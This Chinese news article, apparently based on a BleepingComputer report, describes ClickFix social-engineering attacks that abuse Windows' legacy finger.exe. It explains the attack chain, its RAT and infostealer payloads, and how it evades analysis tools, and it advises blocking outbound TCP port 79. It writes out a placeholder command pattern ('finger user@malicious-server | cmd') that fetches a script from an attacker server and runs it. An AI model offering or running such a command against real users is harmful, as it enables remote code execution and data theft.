黑客滥用古董Windows命令,40年后仍可远程毒控你的电脑
11月16日消息,科技媒体bleepingcomputer昨日(11月15日)发布报告指出,近期有黑客组织利用诞生约40年的“Finger”协议,将其作为新型ClickFix恶意软件攻击链条中的关键环节。
注:Finger协议是一种非常早期的互联网协议,诞生于上世纪70年代,主要功能是让用户查询其他用户的公开信息(如登录名、最后上线时间等)。在现代网络环境中已被基本废弃,但其客户端程序(finger.exe)仍在部分操作系统(如Windows)中保留。
攻击者利用该协议,在新型的ClickFix恶意软件攻击中,向受感染的Windows设备远程下发并执行恶意指令。Finger协议最初用于在Unix/Linux系统上查询用户信息,后来也被集成到Windows系统中。
虽然如今已鲜少有人使用,但其作为系统原生工具的特性,使其成为一种理想的“原生二进制程序(LOLBIN)”,能有效规避部分安全软件的检测机制。
攻击的核心在于社会工程学欺骗。攻击者会通过各种方式(如网页弹窗)显示一个伪造的“人机验证”提示,诱导用户按下Win+R快捷键并输入一行看似无害的命令。
该命令格式通常为 finger [用户名]@[恶意服务器地址] | cmd。一旦用户执行,Windows系统内置的finger.exe程序便会向指定服务器发起请求,而服务器返回的并非用户信息,而是一段预设的恶意脚本。
通过管道符 |,该脚本的输出被直接传递给Windows命令处理器cmd.exe执行,从而完成恶意代码的远程投递。
恶意脚本执行后,会立即展开一系列后续动作。它首先会创建一个随机命名的路径,并下载一个伪装成PDF文件的ZIP压缩包。解压后,其中的恶意载荷便会被激活。
根据分析,这些载荷主要分为两类:一类是专门用于窃取用户密码、浏览器记录等敏感数据的信息窃取程序(Infostealer);另一类则是功能更强大的NetSupport Manager远程访问木马(RAT),一旦植入,攻击者便能完全控制受害者的计算机。
为实现持久化,该脚本还会创建一个计划任务,确保恶意软件在用户每次登录系统时都能自动运行。
研究人员发现,这种攻击手法还在不断演变。在一些更新的攻击案例中,恶意脚本在执行核心任务前,会先扫描受害者电脑中是否存在常见的恶意软件分析工具。
这些工具包括Process Monitor、Wireshark、Fiddler、OllyDbg等数十款。如果检测到任何一款分析工具正在运行,脚本会立即终止执行,从而增加安全研究人员对其进行分析和追踪的难度。
由于此类攻击依赖于Finger协议进行通信,而该协议使用专门的TCP 79端口,因此防御策略也相对明确。对于绝大多数企业和个人用户而言,Finger协议并无实际用途。因此,系统管理员和安全防护人员应在网络防火墙上阻止所有出站到TCP 79端口的流量。
相关攻略
11月17日消息,微软已扩大了Windows 11 25H2版本的推送范围,现在所有“寻求”升级的用户都可获得。更重要的是,对于正在使用已达到或即将停止支持的Windows 11用户,版本25H2已
11 月 16 日消息,当地时间 11 月 16 日,戴尔与微软发布声明,宣布其联合开发的全托管云端文件系统服务“Azure 原生 Dell PowerScale”正式进入 Public Prev
11 月 16 日消息,科技媒体 bleepingcomputer 昨日(11 月 15 日)发布博文,报道称近期有黑客滥用诞生约 40 年的“Finger”协议,成为新型 ClickFix 恶意
11 月 16 日消息,微软当地时间 12 日宣布扩张其位于丹麦 Lyngby 的设施,将其打造为该企业最大的量子研究机构。这笔追加资金也让微软在丹麦的量子领域投资累计总额突破 10 亿丹麦克朗(
11月16日消息,Win11系统全面增加AI功能,甚至变成原生AI代理系统,这是微软的目标,然而这个过程中引发了大家的不满。前几天我们报道过微软Windows+设备总裁Pavan Davuluri网
热门专题
最新APP
热门推荐
近日,小米科技创始人雷军通过社交媒体平台,针对外界对小米汽车安全设计的质疑作出回应。他连续发布多条微博,重申小米汽车始终将安全置于首位,并澄清此前部分言论被断章取义的情况。雷军在微博中表示,去年4月
11月17日消息,11月17日,京东在三亚举办第三场品酒会,京东集团创始人、董事局主席刘强东再次来到现场直播。值得关注的是,京东旗下品牌“七鲜咖啡”在会上首次亮相,刘强东以主理人身份为产品推介,并表
以太坊多签储存包通过引入多个签名授权机制,极大地提升了链上资产的安全性,有效避免了单点风险。本文将介绍主流的多签储存包设置方法,帮助用户为自己的数字资产建立一道坚固的“保险库”。
DNF11 06职业改版已经上线韩服,这次改版削减了学习大技能需要的SP,增加了一些技能攻击力,比如血法,那么DNF11 06职业改版血法技能数据是什么?下面就给大家带来DNF11
11月17日消息,据博主“汽车365热线”爆料,奥迪Q8车主秦先生向其反馈,自己花费了58万元购买的奥迪4S店试驾车,结果卖车是发现是事故车,秦先生认为自己遭到了4S店的故意欺诈。秦先生介绍,当时他